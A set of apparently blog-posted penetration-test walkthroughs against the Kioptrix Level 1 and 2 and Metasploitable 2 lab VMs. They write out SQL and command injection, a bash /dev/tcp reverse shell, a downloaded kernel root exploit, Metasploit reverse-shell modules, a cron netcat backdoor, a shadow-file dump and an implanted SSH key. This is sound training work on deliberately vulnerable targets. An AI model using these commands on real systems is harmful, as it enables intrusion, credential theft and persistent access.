Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series which can be found here. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Lets get started!

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.152

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on port 80/tcp, Apache httpd 2.0.52 on port 443/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. It’s probable that this web server has a back-end database running SQL on it ,which might be vulnerable to an SQL injection.

root@kali:~# nmap -sS -T4 -A 192.168.182.152

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-25 14:11 CST
Nmap scan report for 192.168.182.152
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            621/udp  status
|_  100024  1            624/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-02-25T18:02:19+00:00; -2h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:5C:FF:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.182.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
root@kali:~# 

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I will try to perform and SQL Injection.

I tested the login form using ‘ or ‘1’=’1 and it worked.

The reason why it probably worked was because the SQL statement is along the lines of this:

 SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying the username and password with ‘ or ‘1’=’1 will turn the SQL statement into:

 SELECT username FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because ‘ or ‘1’=’1 always means true, this SELECT statement will log us in and return the first username for the user table.

So now we have a Ping command prompt which might be vulnerable to a Command Injection. Using the command ; id I found that the application was vulnerable to a command injection, so I also tried to see if I could get the usernames and passwords on the server. I was able to get the /etc/passwd file but didnt have access to /etc/shadow .

Knowing that the application is vulnerable to a command injection, I took it a step further and tried to get a reverse shell.
Used ncat to set up the listener to catch the reverse shell.

root@kali:~# nc -nvlp 443

Then went back to the console on the website and ran the following command to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1


I successfully got a reverse shell and as apache. I will next try to do privilege escalation to get the desired root account.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)
bash-3.00$

It looks like the server is running CentOS release 4.5 which after doing some research, I found it was vulnerable to the ‘ip_append_data()’ Ring0 Privilege Escalation exploit..

So on the the shell that we recently obtained, I used wget to download the exploit to the server.

bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--16:20:14--  https://www.exploit-db.com/download/9542
           => `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]

    0K ..                                                    100%   40.04 MB/s

16:20:14 (40.04 MB/s) - `9542' saved [2645/2645]

bash-3.00$ ls
9542 

Then I compiled the program, and ran the exploit to get root shell that we all desire.

bash-3.00$ ls
9542
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc 9542.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Feb 25 16:20 9542.c
-rwxr-xr-x  1 apache apache 6932 Feb 25 16:21 a.out
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# 
sh-3.00# hostname
kioptrix.level2
sh-3.00# 

Straightforward and to the point. Now on to level 3!

Kioptrix Level 1 is the first in the series of five. Point of the game is to get a root shell of the vulnerable machine. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. More info that comes from the author will be listed below with the link to download the VM here.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Without further ado, lets get started.

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover I was able to find out our victim with the ip address of 192.168.182.151

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and enumeration

I used nmap to scan the victim and found it was running OpenSSH 2.9p2 on port 22, Apache httpd 1.3.20 on ports 80 and 443, samba smbd on port 139, and rpcbind on port 111.

root@kali:~# nmap -sS -T4 -A 192.168.182.151

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-10 22:11 CST
Nmap scan report for 192.168.182.151
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2017-02-11T05:13:37+00:00; +1h01m49s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
MAC Address: 00:0C:29:C2:C8:5D (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.182.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

Used nbtscan to scan for NetBIOS information.

Did a simple smb enumeration using enum4linux tool and found out the victim is running Samba 2.2.1a, which is vulnerable to Samba trans2open Overflow. The exploit can be located here.

root@kali:~# enum4linux -a 192.168.182.151 

Exploitation

Samba TRANS2_OPEN Buffer Overflow

A description of this vulnerability is listed below, which is from rapid7’s Vulnerability & Exploit Database.With that, I used the metasploit module exploit/linux/samba/trans2open to exploit this vulnerability.

Description- Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set RHOST 192.168.182.151
RHOST => 192.168.182.151
msf exploit(trans2open) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(trans2open) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(trans2open) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.151:32774) at 2017-02-11 00:16:11 -0600

id
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
hostname
kioptrix.level1

Conclusion

After getting root shell I found the flag in /var/spool/mail which said :
“If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…”
.
Well it that’s it for level 1. It will only get harder from here. Next is Level 2.

Metasploitable is a virtual machine that was intended to be vulnerable so you could test out some penetration tools and perform some common penetration techniques on it. What I will do is go through the 5 phases of a pentration test(except reconnaissance) and talk about some of the tools and type of exploits I used. Granted Metasploitable 2 has many other vulnerabilities, but I will only cover a few which will give you a good start on exploiting Metasploitable 2. Below are the IP addresses of my Kali and Metasploitable virtual machines.

Kali Linux Machine

 192.168.182.147 

Metasploitable 2

 192.168.182.150 

Scanning and Enumeration

Scanning with nmap

Using nmap to do a version scan with OS detection shows the services and versions each service is running. According to nman the OS is running Linux 2.6.X as well.

root@kali:~# nmap -sV -O 192.168.182.150 -p1-65535

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-04 01:26 CST
Nmap scan report for 192.168.182.150
Host is up (0.012s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37131/tcp open  nlockmgr    1-4 (RPC #100021)
38108/tcp open  unknown
53107/tcp open  mountd      1-3 (RPC #100005)
54247/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:13:C8:C2 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Banner grabing (port 23)

This was very intersting! I was able to find out username and password credentials(msfadmin/msfadmin) just by a simple banner grab using telnet.

root@kali:~# telnet 192.168.182.150
Trying 192.168.182.150...
Connected to 192.168.182.150.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: 

Banner grabbing port web server

Using netcat we found that the victim is running Apache httpd 2.2.8 ((Ubuntu) DAV/2). I also found out that getting on my web browser and connecting to http://192.168.182.150 I was able to find services like Damn Vulnerable Web App, Multillidae, phphMyAdmin, Wiki, and WebDAV, running on the victim machine as well as the username msfadmin and password msfadmin credentials to log in.


VNC on port 5900

On the nmap scan I saw that the victim was running VNC (protocol 3.3). I tried connecting to it but it requires a password to get it. I will brute-force my way in later in this pentest.

root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Reading password failed
root@kali:~# 

Exploitation

VSFTPD v2.3.4 Backdoor (Port 21)

According to nmap Metasploitable is running VSFTPD v2.3.4., which in 2011 this backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011. This backdoor was removed on July 3rd 2011. We are going to check to see if this server contains the backdoor. Enter any username you like and add “:)” at the end. You can use anything for the password. If the backdoor is there, then it will trigger without valid credentials. The login will hang after the password, which tells us that the FTP server is still processing the login attempt. If we use Netcat and connect to port 6200 we will get a root shell, which indicates the backdoor is present. Could also Metasploit framework for this exploit as well, located Here.

root@kali:~# ftp 192.168.182.150
Connected to 192.168.182.150.
220 (vsFTPd 2.3.4)
Name (192.168.182.150:root): backdoor:)
331 Please specify the password.
Password:
root@kali:~# nc 192.168.182.150 6200
whoami
root
id
uid=0(root) gid=0(root)
ls -l
total 85
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13800 Feb  4 00:27 dev
drwxr-xr-x  95 root root  4096 Feb  4 00:30 etc
drwxr-xr-x   6 root root  4096 Apr 16  2010 home
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
-rw-------   1 root root 10147 Feb  4 00:30 nohup.out
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x 108 root root     0 Feb  4 00:27 proc
drwxr-xr-x  13 root root  4096 Feb  4 00:30 root
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  12 root root     0 Feb  4 00:27 sys
drwxrwxrwt   4 root root  4096 Feb  4 00:30 tmp
drwxr-xr-x  12 root root  4096 Apr 27  2010 usr
drwxr-xr-x  15 root root  4096 May 20  2012 var
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

Java RMI Server Insecure Default Configuration Java Code Execution (Port 1099)

Searching for a java exploit, I stumbled across this on the Rapid7 Vulnerability & Exploit Database,.

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

What I did was use metasploit and load the module “exploit/multi/misc/java_rmi_server” and set the options up to run the exploit. What’s a bit different here is I set the payload to java/meterpreter/reverse_tcp before running the exploit.

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      192.168.182.150  yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using URL: http://0.0.0.0:8080/boSyAV2fxhkfw
[*] Local IP: http://192.168.182.147:8080/boSyAV2fxhkfw
[*] Server started.
[*] 192.168.182.150:1099 - Sending RMI Header...
[*] 192.168.182.150:1099 - Sending RMI Call...
[*] 192.168.182.150  java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45741 bytes) to 192.168.182.150
[*] Meterpreter session 1 opened (192.168.182.147:4444 -> 192.168.182.150:51250) at 2017-02-04 05:28:51 -0600
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > 

Ingreslock (Port 1524)

The ingreslock is used to lock parts of an Ingres database, however is it also used as a backdoor set by trojans to get into a system. A simple netcat connection is all we need to exploit this.

root@kali:~# nc 192.168.182.150 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# 

NFS Share misconfiguration (Port 2049)

NFS(Network File Share) is a service, in Unix, used to share resources across the network, however system admistrators need to pay attention because misconfiguring it could present a vulnerability like the one shown here. During the nmap scan it was shown that NFS was running on port 2049. Using the command showmount -e 192.168.182.150, I was able to discover that the root directory was being shared!! As you know, for sure I was going to exploit this vulnerability listed below.

Showing NFS server’s export list

root@kali:~# showmount -e 192.168.182.150
Export list for 192.168.182.150:
/ *
root@kali:~# 

Making a mount point in order to get view all the contents of the server. I also run the df -h command in order to show that we have access to the root directory of the server. In the post exploitation phase I will add a ssh key on the server’s authorized_keys file. More will be explained later in this guide.

 
root@kali:~# mkdir /temp/root_access2Metaploitable/
root@kali:~# mount -t nfs 192.168.182.150:/ /temp/root_access2Metaploitable/ -o nolock
root@kali:~# df -h
Filesystem         Size  Used Avail Use% Mounted on
udev                10M     0   10M   0% /dev
tmpfs              1.6G  9.1M  1.6G   1% /run
/dev/sda1           57G   17G   38G  31% /
tmpfs              3.9G  212K  3.9G   1% /dev/shm
tmpfs              5.0M     0  5.0M   0% /run/lock
tmpfs              3.9G     0  3.9G   0% /sys/fs/cgroup
tmpfs              798M  8.0K  798M   1% /run/user/132
tmpfs              798M   12K  798M   1% /run/user/0
/dev/sr0           3.1G  3.1G     0 100% /media/cdrom0
192.168.182.150:/  7.0G  1.5G  5.2G  22% /temp/root_access2Metaploitable

Bruteforcing Vncviewer Login Credentials (Port 5900)

Usinging Metasploit’s auxiliary module “auxiliary/scanner/vnc/vnc_login” I used it to brute-force the victim and get the password “password”. With this I was able to go back run vncviewer again with the correct credentials and not only get a GUI but also root shell into the system!

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set RHOSTS 192.168.182.150
RHOSTS => 192.168.182.150
msf auxiliary(vnc_login) > run

[*] 192.168.182.150:5900 - Starting VNC login sweep
[!] No active DB -- Credential data will not be saved!
[+] 192.168.182.150:5900 - LOGIN SUCCESSFUL: :password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(vnc_login) > 
root@kali:~# vncviewer 192.168.182.150
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

UnrealIRCD 3.2.8.1 Backdoor Command Execution (Port 6667)

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. Lets use the Metasploit Framework with exploit/unix/irc/unreal_ircd_3281_backdoor module to exploit this backdoor.

root@kali:~# msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.182.150
RHOST => 192.168.182.150
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.182.147:4444 
[*] Connected to 192.168.182.150:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ce3SW1J9SQ4K3cOX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ce3SW1J9SQ4K3cOX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.150:58533) at 2017-02-04 00:35:19 -0600

id
uid=0(root) gid=0(root)
whoami
root

Post Exploitation

Getting the usernames and passwords from the Victim

When you have a reverse shell, you could use the cat command to show what the contents in the /etc/shadow file. This displays the hashes to the passwords to the usernames. With further investigation, you can tell that these are MD5(Unix) passwords.

root@metasploitable:/# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
root@metasploitable:/# 

Enable a Cron Job to run every 5 minutes

Using the command below we can run a cron job to run every 5 minutes which would run Netcat to return us a root shell. Open /etc/crontab on the linux victim and pasting the line below to the end of the file. Exit and save the file and restart the cron service by entering service cron restart. Now all you have to do is set up a Netcat listener on your kali machine to pick up the shell.

 */5 * * * * root nc 192.168.182.147 12345 -e /bin/bash 

This will setup the listener to grab the shell

nc -lvp 12345

Adding a SSH key on the Server for future use

Since we have access to the servers SSH keys, I will be generating my own ssh key using ssh-keygen and append it to Metasploitable’s authorized_keys file using the
cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys command.

 
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
e7:89:5d:df:ec:86:ec:88:18:ab:7c:ea:67:d3:c7:49 root@kali
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|                 |
|                 |
|        S . .    |
|         = oE. o |
|        o.+o o..o|
|     .  =+..+.o..|
|     .=*o........|
+-----------------+
root@kali:~# cat ~/.ssh/id_rsa.pub >> /temp/root_access2Metaploitable/root/.ssh/authorized_keys

We now have successfully authenticated to the server with the user root without needing a password. I could come back to this anytime now without password authentication.

root@kali:~# ssh root@192.168.182.150
Last login: Sat Feb  4 15:56:27 2017 from 192.168.182.147
